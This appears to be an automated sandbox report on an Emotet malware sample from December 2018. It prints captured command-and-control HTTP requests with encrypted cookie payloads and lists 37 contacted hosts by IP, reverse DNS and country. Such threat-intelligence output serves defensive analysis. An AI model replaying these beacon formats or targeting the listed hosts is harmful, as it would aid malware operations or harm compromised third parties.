Connection: Keep-Alive
Cache-Control: no-cache

http://209.112.181.206:443/
  • Hostname: 209.112.181.206:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 56085=DUzCtXD7CUy3/ENSpODGngD9ZqI1GQaWcNPC/QnFV04wq2OUIWoEDMLUyesOcgUFYix9naWU2W+ID0Y2s9N8RD9NoKiXgrhPIej4VMazFdoedTIB9PUHnZMOd4d3uYz33UmVOLivjTDpCi5SwtDWT2X+t8EfLEdHxElbVvspPIvyI9PwEmJEgFgb9lOzdy+JC2CeSO99eXb+jh/syOFZtP3a0SrVfD/fHGmPbMl7uYequw893K294F2+sRpLEheCRCxA5YvUkztJEs3txBhe70jCkFZSt636HS14U+RqM9fPkORC9JF1/fInf8v+Gtg23ha8F2tZVfC3qDLZlaStE4WYwY+Yli7T6mWlNvg8IaAl0rNo1TW2kU/YxEFaJ16kT6Sprm8f+4Ex8+903nciOSiXBbutpDSUnrZgSf7gAN1SpCBNuf6IBJqE/VimA2R9uSH5PA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 209.112.181.206:443
Connection: Keep-Alive
Cache-Control: no-cache

http://209.112.181.206:443/
  • Hostname: 209.112.181.206:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 13640=BpgkIqqtdhInqR3I/ZTUoiH7a+JLXgj6KGqIAjxCAvk3YirMEa7rAb/Kn081/iHZEGSJ3kAHfrvMhbjMwwFA5EBfe4Vt6rLfRguMCNNp2UHuy1sbtew2s+j9L3pDnW/d3UmVOLivjTDpCi5SwtDWT2X+t8EfLEdHxElbVvspPIvyI9PwEmJEgFgb9lOzdy+JC2CeSO99eXb+jh/syOFZtP3a0SrVfD/fHGmPbMl7uYequw893K294F2+sRpLEheCRCxA5YvUkztJEs3txBhe70jCkFZSt636HS14U+RqM9fPkORC9JF1/fInf8v+Gtg23ha8F2tZVfC3qDLZlaStE4WYwY+Yli7T6mWlNvg8IaAl0rNo1TW2kU/YxEFaJ16kT6Sprm8f+4Ex8+903nciOSiXBbutpDSUnrZgSf7gAN1SpCBNuf6IBJqE/VimA2R9uSH5PA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 209.112.181.206:443
Connection: Keep-Alive
Cache-Control: no-cache

http://92.27.103.140:443/
  • Hostname: 92.27.103.140:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 43971=lj/x8TNLHYfhbhTMz2+lo0wDygt/BSG/nkib893u6RvwYR1NAqvAh386DHoMZxEoymCut2yNLhzq85ECXMohLFT97k5JHt2zYXQMMTnIPT11jEduy2IknoA5Rs//+YstrdAOhX03wOOeU0SctaMtHWnpqvIwu95GYkFilgj42qqchL2B39ppBMWuXUlZXXe9DGEQFIVbhCQztaotBzdPctbK5S4ehClr8BAf1rAa/xCq6MAwUjDrVXMZjtOHSGITqTU0ewrXEV+vRtOgqfJ6kY0la2CN14u7Gc8zeIkuNqJ8XtY75sN37Jyz4PiEWTgWziCGISTIKqLm5r0jeNGEg/3nR4Jk2859cWDQVTfdxHprSwxFf2fI6MVCpZXzyr6AkzUvkzik8smEvDWLFdkb7w/IM/FQFMJat+BBjQHIXwDBD7NT
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 92.27.103.140:443
Connection: Keep-Alive
Cache-Control: no-cache

http://92.27.103.140:443/
  • Hostname: 92.27.103.140:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 21434=lRUHfA9IM+Q6vPKUSgfDpi/m+8c/nwygole+hXfXqT0mdnxYnqo47WQPoU5d1Km8gdpIP8MwJGNdE3hr0NlItApYQGCvfeUDq0v4bVIMmzjHKQZZvTPCWDIJ60T4M+Sf3UmVOLivjTDpCi5SwtDWT2X+t8EfLEdHxElbVvspPIvyI9PwEmJEgFgb9lOzdy+JC2CeSO99eXb+jh/syOFZtP3a0SrVfD/fHGmPbMl7uYequw893K294F2+sRpLEheCRCxA5YvUkztJEs3txBhe70jCkFZSt636HS14U+RqM9fPkORC9JF1/fInf8v+Gtg23ha8F2tZVfC3qDLZlaStE4WYwY+Yli7T6mWlNvg8IaAl0rNo1TW2kU/YxEFaJ16kT6Sprm8f+4Ex8+903nciOSiXBbutpDSUnrZgSf7gAN1SpCBNuf6IBJqE/VimA2R9uSH5PA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 92.27.103.140:443
Connection: Keep-Alive
Cache-Control: no-cache

http://92.27.103.140:443/
  • Hostname: 92.27.103.140:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 42945=B5wKgiMF10uxQsyAZQAAB6rwRCjFfxlh7uX3U7KpauZmeSOom6fdIJeOn02b/6Zr2DB/qmntwf8huDPaahWGQydnTiJPpRLbG51t6uVhXUs8fhINQD8tRKKgmdATB7cW3UmVOLivjTDpCi5SwtDWT2X+t8EfLEdHxElbVvspPIvyI9PwEmJEgFgb9lOzdy+JC2CeSO99eXb+jh/syOFZtP3a0SrVfD/fHGmPbMl7uYequw893K294F2+sRpLEheCRCxA5YvUkztJEs3txBhe70jCkFZSt636HS14U+RqM9fPkORC9JF1/fInf8v+Gtg23ha8F2tZVfC3qDLZlaStE4WYwY+Yli7T6mWlNvg8IaAl0rNo1TW2kU/YxEFaJ16kT6Sprm8f+4Ex8+903nciOSiXBbutpDSUnrZgSf7gAN1SpCBNuf6IBJqE/VimA2R9uSH5PA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 92.27.103.140:443
Connection: Keep-Alive
Cache-Control: no-cache

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven02_64 Seven02_64 VirtualBox 2018-12-07 11:37:45 2018-12-07 11:40:51 186

37 Host(s) detected

IP Address Hostname Reverse DNS
98.5.163.186 United States cpe-98-5-163-186.buffalo.res.rr.com.
98.188.200.74 United States wsip-98-188-200-74.om.om.cox.net.
92.27.103.140 United Kingdom host-92-27-103-140.static.as13285.net.
86.43.125.152 Ireland
81.213.63.109 Turkey 81.213.63.109.dynamic.ttnet.com.tr.
69.198.17.20 United States 69-198-17-20.customerip.birch.net.
5.9.128.163 Germany likop.org.
49.212.135.76 Japan www7302uf.sakura.ne.jp.
23.254.203.51 United States cvps11648662788.hostwindsdns.com.
23.25.165.74 United States 23-25-165-74-static.hfc.comcastbusiness.net.
219.94.254.93 Japan www3079uf.sakura.ne.jp.
216.221.68.35 Canada d221-68-35.commercial.cgocable.net.
210.2.86.94 Vietnam vs94.maychutot.com.
210.2.86.72 Vietnam
209.112.181.206 United States 209-112-181-206.static.acsalaska.net.
201.196.89.80 Costa Rica
200.60.71.194 Peru
200.52.75.212 Mexico 212.75.52.200.in-addr.arpa.
198.199.185.25 United States incoming1.mail.steinerstudios.com.
192.237.251.185 United States
192.155.90.90 United States li583-90.members.linode.com.
190.96.22.93 Chile static.93.gtdinternet.com.
189.210.114.18 Mexico 189-210-114-18.static.axtel.net.
189.157.235.122 Mexico dsl-189-157-235-122-dyn.prod-infinitum.com.mx.
189.155.54.228 Mexico dsl-189-155-54-228-dyn.prod-infinitum.com.mx.
187.155.234.215 Mexico dsl-187-155-234-215-dyn.prod-infinitum.com.mx.
186.23.189.192 Argentina cpe-186-23-189-192.telecentro-reversos.com.ar.
181.228.204.125 Argentina 125-204-228-181.cab.prima.com.ar.
165.227.213.173 United States symphony-solution.com.
162.252.103.78 United States 162-252-103-78.static.wiline.com.
159.65.76.245 United States server.polychip.net.
144.76.117.247 Germany mail.cogisystem.com.
138.68.139.199 United Kingdom
135.19.206.30 Canada modemcable030.206-19-135.mc.videotron.ca.
133.242.208.183 Japan www14169uj.sakura.ne.jp.
109.104.79.48 United Kingdom lvps109-104-79-48.vps.webfusion.co.uk.
107.184.201.99 United States cpe-107-184-201-99.socal.res.rr.com.

Host(s) by Country

Hosts Country 13
13 United States United States
5 Mexico Mexico
3 United Kingdom United Kingdom
3 Japan Japan
2 Argentina Argentina
2 Vietnam Vietnam
2 Canada Canada
2 Germany Germany
1 Ireland Ireland
1 Chile Chile
1 Peru Peru
1 Costa Rica Costa Rica
1 Turkey Turkey

#infosec #automation

TheSystem Itself @ 2018-12-07 11:42:11

Detected family: #Emotet

TheSystem Itself @ 2018-12-07 11:48:03